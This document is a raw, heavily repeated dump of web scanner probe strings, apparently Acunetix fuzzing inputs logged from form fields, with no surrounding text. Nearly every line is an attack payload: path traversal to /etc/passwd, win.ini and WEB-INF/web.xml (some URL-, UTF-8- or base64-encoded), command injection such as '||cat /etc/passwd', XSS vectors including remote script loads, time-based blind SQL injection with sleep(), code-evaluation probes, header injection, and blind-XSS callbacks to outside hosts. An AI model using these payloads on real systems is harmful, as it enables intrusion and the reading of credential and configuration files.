1&n931855=v941080

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

JBo7TOv0')

)

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

Bpb9d4tJ'))

"|"ld

1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

1_oGC7N <ScRiPt >prompt(975419)</ScRiPt>

'

1

testasp.vulnweb.com

-1)

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1

1

-1))

/etc/passwd

"

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

fdPX6YNo'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

382ExzJh')

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

http://hitIhupmJHHrD.bxss.me/

acunetix_wvs_invalid_filename

WJhEZYoW'))

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

"&dir&"

comments

http://www.acunetix.tst

1

1

comments/.

'"

1

1

1

file:///etc/passwd

|dir

1

1

1'"()&%<ScRiPt >prompt(982613)</ScRiPt>

1

<!--

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(937701)</ScRiPt>

1

1

1

WEB-INF/web.xml

"|dir

1

1_937365

1

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu6044\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6044

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux5709\xc0\xbez1\xc0\xbcz2a\x90bcxuca5709

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(924740)</ScRiPt>

1

1

1

1<script>prompt(903285)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(936467)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903431></ScRiPt>

1

1

1<ScRiPt >prompt(959198)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9868485*9734854)

1<video><source onerror="javascript:prompt(944542)">

1

1

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976270)"></g></svg>

'+response.write(9868485*9734854)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(904132))>

1

"+response.write(9868485*9734854)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(963751)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959898)>

WEB-INF/web.xml

1

1

${100275+100234}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(927563)>

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1<img/src=">" onerror=alert(947368)>

1&n973641=v920762

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

1

-1)

1<ScRiPt%20>prompt(941848)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1&lt

'"()

"|"ld

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

1

rWSOwj3u'

1

\xf6<img acu onmouseover=prompt(989591) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

HZYycPHY')

1

1

"

1

1<input autofocus onfocus=prompt(938750)>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

bfPdTxSz'))

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1

1

/etc/passwd

"

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitVvEkWaqt3M.bxss.me/

acunetix_wvs_invalid_filename

1

1_Eqwjz <ScRiPt >prompt(945198)</ScRiPt>

-1)

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

comments

-1))

1

1

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://www.acunetix.tst

comments

K4xCyhAK'

1

'"

1

'&dir&'

1'"()&%<ScRiPt >prompt(907275)</ScRiPt>

1

comments/.

B0bA5bAW')

'"()&%<ScRiPt >prompt(997403)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

<!--

"&dir&"

1

1

1

1

f9zxj78o'))

1_979595

|dir

1

1

1

1

1

1

1

'|dir

file:///etc/passwd

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

acu7861\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7861

1

1

WEB-INF/web.xml

1

acux2299\xc0\xbez1\xc0\xbcz2a\x90bcxuca2299

1

1

WEB-INF\web.xml

1<ScRiPt >prompt(910639)</ScRiPt>

1

1

1

1<script>prompt(950239)</script>

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(961712)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945771></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(934988)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<video><source onerror="javascript:prompt(955486)">

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(941779)"></g></svg>

1

1

response.write(9781127*9124509)

1

1

................windowswin.ini

1

1<div style=width:expression(prompt(947945))>

'+response.write(9781127*9124509)+'

1

1

&cat /etc/passwd&

"+response.write(9781127*9124509)+"

1

1

1<iframe src='data:text/html

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(955474)>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918662)>

1

1

cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${99364+100258}

1

1

1<img src=xyz OnErRor=prompt(917930)>

`cat /etc/passwd`

1

1

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(924228)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n972704=v973110

1

1<ScRiPt%20>prompt(981087)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

WEB-INF/web.xml

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

MNiNKaeu'

1

testasp.vulnweb.com

"|"ld

\xf6<img acu onmouseover=prompt(927591) //\xf6>

WEB-INF\web.xml

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

xcruDrFD')

1

'

1<input autofocus onfocus=prompt(991561)>

1

1

1

1

1

FcAPxNOq'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

<a href='http://www.acunetix.com'>website security</a>

"

1

1

http://hitpclQeKumR3.bxss.me/

1

-1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

-1)

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1_vR5o1 <ScRiPt >prompt(959269)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1))

||cat /etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

1

JgavP26W'

1

comments

&dir

zkTXqhay')

file:///etc/passwd

1

'"

1

YVawcq8B'))

1

comments/.

1

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

1'"()&%<ScRiPt >prompt(945527)</ScRiPt>

1

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(948380)</ScRiPt>

1

"&dir&"

1

1

WEB-INF\web.xml

1

1_902943

1

1

|dir

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

'|dir

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2710\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2710

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux6303\xc0\xbez1\xc0\xbcz2a\x90bcxuca6303

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(939848)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(971399)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(906781)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983487></ScRiPt>

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9101901*9383879)

1<ScRiPt >prompt(957080)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

'+response.write(9101901*9383879)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(972905)">

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

"+response.write(9101901*9383879)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951045)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1<div style=width:expression(prompt(923512))>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

1

1

1<iframe src='data:text/html

1

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<body onload=prompt(950530)>

${100366+99114}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963678)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

1

1<img src=xyz OnErRor=prompt(968492)>

1&n981698=v929798

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

'|'ld

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(981919)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

!(()&&!|*|*|

"|"ld

-1))

1<ScRiPt%20>prompt(906182)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

1&lt

B81ITZXU'

^(#$!@#$)(()))******

'"()

1

1

/etc/passwd

1

1

\xf6<img acu onmouseover=prompt(923785) //\xf6>

1

'

1

vEsnqAJZ')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<input autofocus onfocus=prompt(943789)>

1

1

1

"

ErAExXRN'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

-1

1

1

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1_uxt1B <ScRiPt >prompt(959684)</ScRiPt>

&dir

1

1

"

1

http://hitwTBakXa3m9.bxss.me/

1

file:///etc/passwd

-1))

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1

1

'&dir&'

1

q4U62ion'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

1

G2HrO1EJ')

1

1

1

http://www.acunetix.tst

comments

1

ToSHBMMs'))

"&dir&"

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(915898)</ScRiPt>

'"

1

1

comments/.

1

'"()&%<ScRiPt >prompt(985966)</ScRiPt>

1

WEB-INF\web.xml

<!--

1

1

1

1_924276

../../../../../../../../../../windows/win.ini

1

1

|dir

1

1

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acu4999\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4999

1

1

................windowswin.ini

1

acux1267\xc0\xbez1\xc0\xbcz2a\x90bcxuca1267

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(912073)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(921301)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(943284)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904969></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(929771)</ScRiPt>

WEB-INF/web.xml

response.write(9507205*9925003)

1

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(945888)">

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9507205*9925003)+'

'&cat /etc/passwd&'

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962300)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9507205*9925003)+"

"&cat /etc/passwd&"

1<div style=width:expression(prompt(950922))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(927577)>

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950228)>

1

1

|cat /etc/passwd#

1

${100130+99297}

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(939581)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1&n997749=v996682

1

1

1<img/src=">" onerror=alert(970092)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

)

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

1<ScRiPt%20>prompt(968001)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

1&lt

^(#$!@#$)(()))******

-1)

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

'

1

-1))

1

1

\xf6<img acu onmouseover=prompt(963770) //\xf6>

/etc/passwd

"

1

1

1

"

OudWRtW2'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(985682)>

1

1

${@print(md5(acunetix_wvs_security_test))}

maW5cC3S')

1

1

1

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

http://hitHwuoeuFnD6.bxss.me/

Xu4Xvjlj'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1

acunetix_wvs_invalid_filename

&dir

1

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

comments

1

1_6GJkV <ScRiPt >prompt(966329)</ScRiPt>

'&dir&'

-1))

http://www.acunetix.tst

1

1

'"

comments

"&dir&"

b4wGBG3S'

1

1

comments/.

1'"()&%<ScRiPt >prompt(944441)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<!--

1

1

7sKkXY6T')

|dir

1

'"()&%<ScRiPt >prompt(932785)</ScRiPt>

1

1

1

cGZD4phl'))

1

1

1_960277

'|dir

1

1

1

file:///etc/passwd

1

"|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

acu4519\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4519

../../../../../../../../../../windows/win.ini

1

acux1477\xc0\xbez1\xc0\xbcz2a\x90bcxuca1477

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(939772)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(951163)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(937473)</ScRiPt>

................windowswin.ini

1

1

1

response.write(9786163*9155547)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994644></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

&cat /etc/passwd&

1

1

'+response.write(9786163*9155547)+'

1

'&cat /etc/passwd&'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(926800)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9786163*9155547)+"

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(996634)">

1

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983582)"></g></svg>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

`cat /etc/passwd`

1

1

1

1

1<div style=width:expression(prompt(986771))>

../../../../../../../../../../etc/passwd.jpg

${99580+99023}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

WEB-INF/web.xml

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1&n909099=v914445

)

1some_inexistent_file_with_long_name%00.jpg

WEB-INF\web.xml

'|'ld

1

1<body onload=prompt(973545)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935993)>

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

testasp.vulnweb.com

-1))

1

1

1

1<img src=xyz OnErRor=prompt(988051)>

1

bkcOjKj7'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

1<img/src=">" onerror=alert(974306)>

1

FKEBsyqY')

'

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1<ScRiPt%20>prompt(950321)</sCripT>

1

c2F95l19'))

1

"

1&lt

${@print(md5(acunetix_wvs_security_test))}

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

\xf6<img acu onmouseover=prompt(999669) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitApLZPeAzpo.bxss.me/

-1)

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(988333)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

1

1

&dir

comments

<a href='http://www.acunetix.com'>website security</a>

1

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

nhERCvGc'

[url=http://www.acunetix.com]website security[/url]

1

comments

1'"()&%<ScRiPt >prompt(976569)</ScRiPt>

1

'&dir&'

<!--

1_bKVEK <ScRiPt >prompt(904174)</ScRiPt>

1

nbsuhKrO')

comments/.

1

'"()&%<ScRiPt >prompt(937710)</ScRiPt>

1

file:///etc/passwd

bLlG3SGQ'))

1

"&dir&"

1

1

1_994353

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acu9896\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9896

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9679\xc0\xbez1\xc0\xbcz2a\x90bcxuca9679

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(935166)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(921118)</script>

1

1

1<ScRiPt >prompt(966009)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921646></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(969259)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(938888)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919654)"></g></svg>

1

1

response.write(9413472*9576735)

1

1<div style=width:expression(prompt(959449))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

'+response.write(9413472*9576735)+'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(932962)>

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9413472*9576735)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954491)>

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(905953)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

1

1<img/src=">" onerror=alert(947714)>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(958043)</sCripT>

1

1

1
